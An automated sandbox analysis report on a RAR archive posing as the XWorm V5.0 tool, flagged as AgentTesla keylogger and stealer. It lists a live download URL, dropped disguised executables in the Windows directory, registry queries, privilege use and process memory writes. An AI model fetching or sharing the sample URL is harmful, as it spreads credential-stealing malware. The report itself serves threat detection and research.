Malware Analysis Report

2024-11-13 16:14

Sample ID 240412-nnnxgsdb2v
Target https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar
Tags
agenttesla agilenet keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar was found to be: Known bad.

Malicious Activity Summary

agenttesla agilenet keylogger spyware stealer trojan

AgentTesla

AgentTesla payload

Executes dropped EXE

Loads dropped DLL

Obfuscated with Agile.Net obfuscator

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks processor information in registry

Uses Task Scheduler COM API

Modifies registry class

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-12 11:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-12 11:32

Reported

2024-04-12 11:39

Platform

win11-20240221-en

Max time kernel

357s

Max time network

369s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe N/A
N/A N/A C:\Windows\$sxr-mshta.exe N/A
N/A N/A C:\Windows\$sxr-cmd.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-160263616-143223877-1356318919-1000\{0208293E-3748-4277-8185-0F1CAD484E09} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\XWorm-V5.0.rar:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm-V5.6-Cracked-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 2076 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 2076 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 4804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 4804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
